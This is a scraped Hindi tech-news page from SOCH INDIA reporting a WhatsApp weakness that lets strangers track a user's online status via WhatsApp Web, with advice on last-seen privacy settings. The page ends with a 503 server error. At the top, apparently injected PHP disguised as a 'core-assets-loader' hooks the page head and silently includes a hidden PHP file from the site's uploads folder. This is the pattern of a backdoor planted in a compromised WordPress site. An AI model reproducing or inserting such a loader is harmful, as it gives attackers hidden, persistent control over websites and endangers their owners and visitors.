add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); WhatsApp का बड़ा फ्लॉ आया सामने, आपकी ऑनलाइन एक्टिविटी को आसानी से किया जा सकता है मॉनिटर – SOCH INDIA
Menu

टेक्नोलॉजी
WhatsApp का बड़ा फ्लॉ आया सामने, आपकी ऑनलाइन एक्टिविटी को आसानी से किया जा सकता है मॉनिटर

nobanner

दुनिया का सबसे पॉपुलर इंस्टेंट मैसेजिंग एप व्हाट्सएप एक ऐसा ऐप जो आजकल लगभग सभी स्मार्टफोन में होता है. लेकिन अब इस एप का एक बड़ा फ्लॉ (गड़बड़ी) सामने आया है.

रॉबर्ट थेटॉन नाम के सॉफ्टवेयर इंजीनियर ने अपने ब्लॉगपोस्ट में बताया है कि व्हाट्सएप का पिक्चर-टेक्स्ट स्टेटस इस बात का पता लगाता है कि यूजर कब ऑनलाइन है.इस फीचर की मदद से यूजर के ऑनलाइन होने के वक्त पता लगाया जा सकता है.

थेटॉन ने अपने ब्लॉग में बताया है कि अगर लैपटॉप या क्रोम ब्राउजर पर व्हाट्सएप वेब का इस्तेमाल करते है तो बेहद आसानी से आपकी एक्टिविटी पर नजर रखा जा सकता है. खास बात ये है कि यहां आपकी प्राइवेसी सेटिंग की भूमिका ज्यादा बड़ी है. अगर यूजर प्राइवेस सेटिंग में जाकर लास्ट सीन में ‘कॉन्टेक्ट ओनली’ का ऑप्शन चुनता है तो ये सिर्फ आपके कॉन्टेक्ट तक ही पहुंचता है.

दरअसल बाई डिफॉल्ट सेटिंग में आपका लास्ट सीन कोई भी देख सकता है और ज्यादातर यूजर इसे बदलते नहीं या जरुरत नहीं समझते. इसका बड़ा नुकसान चुकाना पड़ सकता है.

ब्लॉग के मुताबिक जावास्क्रिप्ट कोड की चार लाइन लिखीं होती हैं, ताकि यूजर के लिए लास्ट सीन सेटिंग्स को ट्रैक किया जा सके. अगर किसी के पास आपका मोबाइल नंबर सेव है और यह नंबर आपके व्हाट्सएप अकाउंट से जुड़ा है तो यह यूजर यह देख सकता है कि आपका एप पर लास्ट सीन क्या था. लेकिन, जो यूजर आपके व्हाट्सएप पर नजर रख रहा है उसके लिए जरूरी नहीं है कि उसका नंबर आपके फोन में सेव हो. ऐसे में आप जब भी ऑनलाइन होते हैं आप पर नजर रखने वाला अजनबी कॉन्टेक्ट भी आपका लास्ट सीन या ऑनलाइन देख सकता है. एंड-टू-एंड एनक्रीप्शन के कारण कोई व्हाट्सएप चैट या तस्वीर तो नहीं देख सकता लेकिन आपकी ऑनलाइन एक्टिविटी पर नजर रखना आसान है.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.